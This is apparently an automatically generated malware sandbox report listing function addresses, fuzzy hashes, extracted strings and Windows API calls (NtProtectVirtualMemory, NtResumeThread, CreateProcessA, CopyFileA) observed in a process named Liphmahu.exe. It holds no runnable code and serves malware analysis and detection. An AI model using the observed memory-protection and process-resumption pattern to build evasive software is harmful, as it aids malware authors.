Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c313ca5ad922d5ff3315538599a89148cd783f7b1127a51bd7fb9aedbb3117
Instruction ID: 4d568fda7148554fc1f5bf4a2841b2507351c7a303cbbba8ca414ff5b44de501
Opcode Fuzzy Hash: a2c313ca5ad922d5ff3315538599a89148cd783f7b1127a51bd7fb9aedbb3117
Instruction Fuzzy Hash: 6731E8B1D056588BEB59CF6BCC453CAFBF3AF89310F14C1AAD408AA265DB740A85CF51

Function 075A0040 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058988226.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75a0000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e7acb120d3b19d4568b1f94a3137d9b66ca8b788913d12ac1f57ea434623ad
Instruction ID: d8d1a84e2713b7c610bbdd658fecdd3e24eb41dba54d3f4a52167dc866dbc7a4
Opcode Fuzzy Hash: 78e7acb120d3b19d4568b1f94a3137d9b66ca8b788913d12ac1f57ea434623ad
Instruction Fuzzy Hash: EC311EB0E052198BD768CF6AC9446DAB7F6BF89304F04C5FA950DA7255EB344A858F10

Function 0717BBC8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94e2611df7d442936e54c1adf514fa09d00648ca07b6bb0ad3434260e266dc7
Instruction ID: f422bcd9d4637a9c010ee471c65a291775d7d6c23530220da4992ac981e19833
Opcode Fuzzy Hash: b94e2611df7d442936e54c1adf514fa09d00648ca07b6bb0ad3434260e266dc7
Instruction Fuzzy Hash: 9031DFB1E156598BE71DCF2B8C40699FBF7AFC9200F04C1FA9518A6255DB300A86CF54

Function 0717A9D8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35afc085f25be7d9cffb35a70d0158193ce3ecf558004e11b97dfa887445494b
Instruction ID: 4062518286b6ea39bc56fef26ab0690b82d06b18a2f7ff176d52da4cff82b938
Opcode Fuzzy Hash: 35afc085f25be7d9cffb35a70d0158193ce3ecf558004e11b97dfa887445494b
Instruction Fuzzy Hash: 1411B3B1D046588BEB29CF6BDD446D9FBF7AFC9300F14C0BA9809AA264DB340985CF41

Function 07437180 Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

4'kq, xrefs: 07437234
poq, xrefs: 074372D7
4'kq, xrefs: 074372CA
4'kq, xrefs: 07437204
(oq, xrefs: 0743734A
4'kq, xrefs: 07437252

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
API String ID: 0-755401861
Opcode ID: cd3a0409f5e6354e82752a0f4b14785df6a41eb4bd04a33a40eb7a06879c76ef
Instruction ID: cfe4d7e963f456dfd2871144be2d2e376fd00caff6a6e16f45d68598c16cba67
Opcode Fuzzy Hash: cd3a0409f5e6354e82752a0f4b14785df6a41eb4bd04a33a40eb7a06879c76ef
Instruction Fuzzy Hash: F451E4B0A402498FC719DB7985506AFBBE7BFC8300F24497DC0499B3A5DF35AC468791

Analysis Process: Liphmahu.exePID: 7852, Parent PID: 7496COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	446
Total number of Limit Nodes:	23

Executed Functions

Function 05D603C8 Relevance: 16.2, Strings: 12, Instructions: 1154COMMON

Download Yara Rule

Strings

$kq, xrefs: 05D60CA9
$kq, xrefs: 05D60CB9
4, xrefs: 05D60DAD
$kq, xrefs: 05D608CF
$kq, xrefs: 05D60D12
$kq, xrefs: 05D6065B
$kq, xrefs: 05D6082F
,oq, xrefs: 05D60E92
$kq, xrefs: 05D6081F
$kq, xrefs: 05D6066B
$kq, xrefs: 05D608DF
$kq, xrefs: 05D60D02

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1127353760
Opcode ID: c11a01bc9ceebfaf0a07c4c5a24b1efad686b463bdd14d017d45fbfe08aaed35
Instruction ID: 814b2b568353833a75fd8f63453ce47dfea8175cc66812312a26c4eea9b8c5df
Opcode Fuzzy Hash: c11a01bc9ceebfaf0a07c4c5a24b1efad686b463bdd14d017d45fbfe08aaed35
Instruction Fuzzy Hash: ECB20A34A00218DFDB14DFA9C998BADB7B6BF48300F15819AE505AB3A5CB74ED42CF50

Function 05D606FF Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$kq, xrefs: 05D60CA9
4, xrefs: 05D60DAD
$kq, xrefs: 05D608CF
,oq, xrefs: 05D60E92
$kq, xrefs: 05D6081F
$kq, xrefs: 05D60D02

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: ,oq$4$$kq$$kq$$kq$$kq
API String ID: 0-569362799
Opcode ID: ce7a1a194d0f31f0fa0a7fda5f6b93803bad9225dc332f687e41651a30a928f0
Instruction ID: f322b1a99a3a2b8be2f2034659ab9633fff80dd95749c83008e8c6e80fe462a6
Opcode Fuzzy Hash: ce7a1a194d0f31f0fa0a7fda5f6b93803bad9225dc332f687e41651a30a928f0
Instruction Fuzzy Hash: 2F22DC34A00215CFDB24DFA4D998BADB7B6BF48300F158196E509AB3A5DB70ED82CF50

Function 05D4BF56 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05D4C240

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 0bac09c0fbd5cf7640557898b0ddb48ae2bf5c06e07ecaaafa4e76963e7c212c
Instruction ID: 8aefb1bccd37324f8e59b7fa097c8b93960e74c4d20230e6ea3978fd2b655ef9
Opcode Fuzzy Hash: 0bac09c0fbd5cf7640557898b0ddb48ae2bf5c06e07ecaaafa4e76963e7c212c
Instruction Fuzzy Hash: 2302C374A05218CFEB64DFA8C984BA9BBF2FB49304F1081AAD509BB355DB709D81CF51

Function 06A2E868 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06A2E8F9

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c978b85ef9df4e707de0aa02ed616ac079586c210a2800848a70a9200eb8b9a0
Instruction ID: d4cead65c1b7f6dd9122e16f7d8b9cd8cd0d47beed4a8251962525f4c755058a
Opcode Fuzzy Hash: c978b85ef9df4e707de0aa02ed616ac079586c210a2800848a70a9200eb8b9a0
Instruction Fuzzy Hash: E921F0B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE559A7210C775A955CBA4

Function 06A2E870 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06A2E8F9

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: eaa52c9fa4c88f76ce50fab63d83429f81d76e4b0bc3e5de5510fdf117eea41f
Instruction ID: 27922a530c5b9c794167a5231205adbce36e697d2b79337b282e557b569e9d65
Opcode Fuzzy Hash: eaa52c9fa4c88f76ce50fab63d83429f81d76e4b0bc3e5de5510fdf117eea41f
Instruction Fuzzy Hash: 1B21F2B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE459A7210C775A950CBA4

Function 05D8F130 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05D8F1A6

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 33c2adcd0b1f73dd46cee843ce72903eafb1cf6d47316993e171783820f24698
Instruction ID: 4605bcb807bc51b080a2ca30081687c34ff13131d47324e0c98ebe1afd368353
Opcode Fuzzy Hash: 33c2adcd0b1f73dd46cee843ce72903eafb1cf6d47316993e171783820f24698
Instruction Fuzzy Hash: E71106B1D003099FDB10DFAAC884AAEFBF8FB49320F14842AD559A7250C775A944CFA5

Function 05D8F138 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05D8F1A6

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 527e547de87e90bf66338d683675cfa9e6756fd4f763187e1f879f40984123fa
Instruction ID: 9850dc746512aa8a126bba405c0be53e186ba1b38bfffa92500d43a02118460e
Opcode Fuzzy Hash: 527e547de87e90bf66338d683675cfa9e6756fd4f763187e1f879f40984123fa
Instruction Fuzzy Hash: E11117B1D003098FDB10DFAAC4846AEFBF4EF49320F10842AD459A7250C774A944CFA5

Function 05D43DC8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05D43F80

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 30a2d3365fb5f570e4828c5a53f10ea7bab726c58ebe5ab7a3ea6dd3a4dfa49c
Instruction ID: 0db5bd2cb9433a61879c6eb58c9d939877a1e4c448dd4a744fb8fe4652996592
Opcode Fuzzy Hash: 30a2d3365fb5f570e4828c5a53f10ea7bab726c58ebe5ab7a3ea6dd3a4dfa49c
Instruction Fuzzy Hash: 58B1D770E05618CFDB54CFA9D984BADBBF2BF89300F60856AD509AB365DB349985CF00

Function 05D43DB8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05D43F80

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: a91e8b32d948e6a424df212109c73b80cc75deb90c2692c1985bb1f437dddd78
Instruction ID: 470692c54dfa42bfcb684e771b25ccbcce46ea584c451bf046cf4ca2ce2e1f92
Opcode Fuzzy Hash: a91e8b32d948e6a424df212109c73b80cc75deb90c2692c1985bb1f437dddd78
Instruction Fuzzy Hash: C1B1E770E05618CFDB54CFA9D984BADBBF2BF89300F54856AD409AB365EB349985CF00

Function 05D43307 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a205c0a60199d44b5addfbf91a48a110094de5bd220bbc24a832c4774ba60d0
Instruction ID: 9a5f7efab53bfff7338fdc151586788ee3570b575a9b9af9a6bc2b32dff76a66
Opcode Fuzzy Hash: 4a205c0a60199d44b5addfbf91a48a110094de5bd220bbc24a832c4774ba60d0
Instruction Fuzzy Hash: C1B1E570D04219CFEB64DF69D985BADBBF2FB49300F6484AAD049AB255DB7499C4CF00

Function 05D660E8 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hoq, xrefs: 05D6663C
Hoq, xrefs: 05D665BD
Hoq, xrefs: 05D665EC

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: Hoq$Hoq$Hoq
API String ID: 0-3310881576
Opcode ID: c4a3add87f209b65378cefec7973e5b6589d8171c4056a7f52d55c73c8653187
Instruction ID: efb97c5869025e91386e50e246762193eb237094cd7964453f5fa80d475a4bb0
Opcode Fuzzy Hash: c4a3add87f209b65378cefec7973e5b6589d8171c4056a7f52d55c73c8653187
Instruction Fuzzy Hash: E7124E30A006059FCB25DFA9C995A6EBBF6FF88300F64852EE4069B355DB35EC46CB50

Function 05D67DA0 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 05D68119
4'kq, xrefs: 05D68099
4'kq, xrefs: 05D67FBA

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$4'kq
API String ID: 0-2478202913
Opcode ID: 1a06123ec445a5562df662112f0984ce069e225123f6a8472cdbc9ae185bdad0
Instruction ID: 639724bbb0b4b865023767b44e2a6e85e8a89e2e41ed033ce90bf8b94ea94287
Opcode Fuzzy Hash: 1a06123ec445a5562df662112f0984ce069e225123f6a8472cdbc9ae185bdad0
Instruction Fuzzy Hash: 29F1B934B11218DFCB04DFA4D998A9DBBB2FF88301F158159E406AB3A5DB75EC42CB90

Function 05D6C780 Relevance: 4.1, Strings: 3, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 05D6C8D5
Hoq, xrefs: 05D6C901
(oq, xrefs: 05D6C8A9

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq$(oq$Hoq
API String ID: 0-3836682603
Opcode ID: 624b909542ad9da5119e212f21e7a5348b6b0553ddf88a8acd49825585f9ab0d
Instruction ID: afa957b3d482174cf062a6371dcd10aa7b4aae0ca7eeb430acac480624773a72
Opcode Fuzzy Hash: 624b909542ad9da5119e212f21e7a5348b6b0553ddf88a8acd49825585f9ab0d
Instruction Fuzzy Hash: CCE11134B10209DFCB04EF68D4949ADBBB2FF89310F51856AE845AB365DB30ED46CB91

Function 05D21EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D22669
4'kq, xrefs: 05D22659

Memory Dump Source

Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 085afe6f0157626737cca3ea56977ddfeddaafc6c7bfb6de75839fbafe59c45f
Instruction ID: 7b05909aa97e502d88e463cfbaa628ee780705e4d49d19760a215c64bf479575
Opcode Fuzzy Hash: 085afe6f0157626737cca3ea56977ddfeddaafc6c7bfb6de75839fbafe59c45f
Instruction Fuzzy Hash: 6242E438E04219CFDB15DB99D948ABEBBB2FF58309F10801AF512A7354DB35A982CF51

Function 05D62659 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 05D62983
$kq, xrefs: 05D62973

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 05d5a90c72454f8a18d75046df247717ea25acd6e179174f046d16dcde16f31f
Instruction ID: eabb0148900ef0c5aa6b7736ca9c493724fce35233542c0d014ed076cd7dc00d
Opcode Fuzzy Hash: 05d5a90c72454f8a18d75046df247717ea25acd6e179174f046d16dcde16f31f
Instruction Fuzzy Hash: 7B124C35A00219CFCB15DFA9D864AADBBB2FF48301F148056E852AB3A4DB78D946CF51

Function 05D229D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 05D22E66
4'kq, xrefs: 05D22E76

Memory Dump Source

Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 1439e7762a3cd26a29f5b85dc079f361a5694457ae609260a3cfa1e72b2f5764
Instruction ID: 51f491ddef17f1f7e9c2d81021e3717fe064994171dada7f32ec4118fb1935ae
Opcode Fuzzy Hash: 1439e7762a3cd26a29f5b85dc079f361a5694457ae609260a3cfa1e72b2f5764
Instruction Fuzzy Hash: 5BF1C274E05218DFCB14DFA4E8986ACBBB2FF59316F20402AF416A7354DB35A986CF41

Function 05D65BA0 Relevance: 2.8, Strings: 2, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 05D65E01
(oq, xrefs: 05D65BB4

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq$d
API String ID: 0-886291620
Opcode ID: c00abf2c95ef5e3b39355a3c0c9f6c8ae0edd9a185d61e2fe49b734369456864
Instruction ID: b1f25ec3311ca0d2f5af601ee974122b6df21055ca2d3b7d3a4c24a4a8bf5840
Opcode Fuzzy Hash: c00abf2c95ef5e3b39355a3c0c9f6c8ae0edd9a185d61e2fe49b734369456864
Instruction Fuzzy Hash: F1D16F34600606CFCB24CF18D58496AB7F6FF88310B99C55AE45A9B765DB30FC86CB90

Function 05D226A8 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 05D22998
4'kq, xrefs: 05D22988

Memory Dump Source

Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 1e7a31f5be441d3e3212e241067ab0fdcebdf01114461c6bdf623b32d15303a1
Instruction ID: e925289d45dd0cccae692d389f150470152106ea1d7b66ed4b4ebb0a9cd0959c
Opcode Fuzzy Hash: 1e7a31f5be441d3e3212e241067ab0fdcebdf01114461c6bdf623b32d15303a1
Instruction Fuzzy Hash: F5A1C538E05219DFDB18DFA8D5486ADBBB2FF98305F50802AF412A7350DB35A986CF51

Function 05D641D1 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 05D642F4
(oq, xrefs: 05D6434B

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq$(oq
API String ID: 0-3207256227
Opcode ID: d5c33ca200020be01b34ed6f5bd4ca8af78a35b3929c05e1f2663f3f176ff28e
Instruction ID: ff7df11e7adb63e8e9ff6d686e42e901b386497a268aa86081364c4bc7e7cc20
Opcode Fuzzy Hash: d5c33ca200020be01b34ed6f5bd4ca8af78a35b3929c05e1f2663f3f176ff28e
Instruction Fuzzy Hash: 70518D313002059FDB159F29D885AAE7BA6FF88354F60816AE806CB395CF35EC46CB91

Function 05D61C30 Relevance: 2.7, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 05D61D36
Hoq, xrefs: 05D61DC5

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq$Hoq
API String ID: 0-3084834809
Opcode ID: d5fa003f02bf56944e1c019a8c23714b67a45767a900607bc441678fc030bd3c
Instruction ID: 347876cda981f5b539663ab34de51cc469beaeedadaf04f36210579d2b75c9d3
Opcode Fuzzy Hash: d5fa003f02bf56944e1c019a8c23714b67a45767a900607bc441678fc030bd3c
Instruction Fuzzy Hash: 8F5179307006058FCB59AF78C458A2EBBB6FF85351B60456EE806DB3A5CE31ED06CB91

Function 05D68C80 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,oq, xrefs: 05D68FFB

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: ,oq
API String ID: 0-651702701
Opcode ID: 1b6cc17017ac21e7bb0bb07a1653c368e5520d86c3f0f322fd11e61fe4ed1458
Instruction ID: f975e975d3970cdbca08f1eeff0ddc08e1a4cdc1f00744508f62d9b59e629198
Opcode Fuzzy Hash: 1b6cc17017ac21e7bb0bb07a1653c368e5520d86c3f0f322fd11e61fe4ed1458
Instruction Fuzzy Hash: ED521775A002288FCB64DF68C991BEDBBF6BF88300F5541DAE509A7351DA309E85CF61

Function 05D631E0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_kq, xrefs: 05D6346D

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (_kq
API String ID: 0-2183774854
Opcode ID: aee11a68c953f6cc4fb48ab2b2c41844e48ec013fbbb02700d91c07bda949155
Instruction ID: 4305aa5755741efc797dfbdb138f2eb81e0e27f303a3f3286b8cee66e0bf1e9f
Opcode Fuzzy Hash: aee11a68c953f6cc4fb48ab2b2c41844e48ec013fbbb02700d91c07bda949155
Instruction Fuzzy Hash: 3C227135A002049FDB14DF68D494AADBBF2FF88310F14846AE906DB3A5CB75ED46CB90

Function 06A2F6CC Relevance: 1.7, APIs: 1, Instructions: 204processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06A2F8B2

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 943235cd4c02fb71b8b1b75d5c8e93703717387228aa968fa077f501405a5b17
Instruction ID: 2ad6558dcc8b684559b48161134380fa026d75b1929dece2af3411a641f17cf8
Opcode Fuzzy Hash: 943235cd4c02fb71b8b1b75d5c8e93703717387228aa968fa077f501405a5b17
Instruction Fuzzy Hash: 32815571D8022A9FDB50DFA9C9817EDBBF2BF48310F248529E855EB254D7748881CF81

Function 06A2F6D8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06A2F8B2

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 68655f4fd363c457b19764e0e5b217873356a8e673e177d99a4557786319b1da
Instruction ID: 62fecda4c804f4a53bda1dcfa22bd9efa0656d9a669cc0145f0fd9dfac03660b
Opcode Fuzzy Hash: 68655f4fd363c457b19764e0e5b217873356a8e673e177d99a4557786319b1da
Instruction Fuzzy Hash: 2C814471D8026A9FDB50DFA9C9817EEBBF1BF48310F248529E859EB254D7748881CF81

Function 0091A328 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0091A57E

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 638abf60fb5611842d1f9feaba5877f3576ab030e0fda29e2fc4980972a2dcbb
Instruction ID: 0bba5ef678f9d66caaeb21c65e5650d91b7baf496211d74c6b768c6fa0258d4c
Opcode Fuzzy Hash: 638abf60fb5611842d1f9feaba5877f3576ab030e0fda29e2fc4980972a2dcbb
Instruction Fuzzy Hash: A3813470A01B088FDB24DF29D04579ABBF5FF88304F00892DD48AD7A50D775E986CB91

Function 05D69B0B Relevance: 1.7, Strings: 1, Instructions: 409COMMON

Download Yara Rule

Strings

$kq, xrefs: 05D69C4F

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: $kq
API String ID: 0-3037731980
Opcode ID: 6c4ce11f50bbd2edf66167cf3e960ef2f2fd6d2755aa1098ae3308d1b71c01b0
Instruction ID: 0abb9ef6a5673aa7f83b40a367a8163312e08851c643279f0f8ff48f505db794
Opcode Fuzzy Hash: 6c4ce11f50bbd2edf66167cf3e960ef2f2fd6d2755aa1098ae3308d1b71c01b0
Instruction Fuzzy Hash: 6BE1BD707082029FDB14AF29D865A7EBAB2FF84300F55446BF982CB395DA34DD46CB12

Function 06A2455D Relevance: 1.6, APIs: 1, Instructions: 147fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 06A246AD

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 4ca699f15fcbfdce150ee6ebb36fe6c1f07dad35e699f840271ea842240d6c44
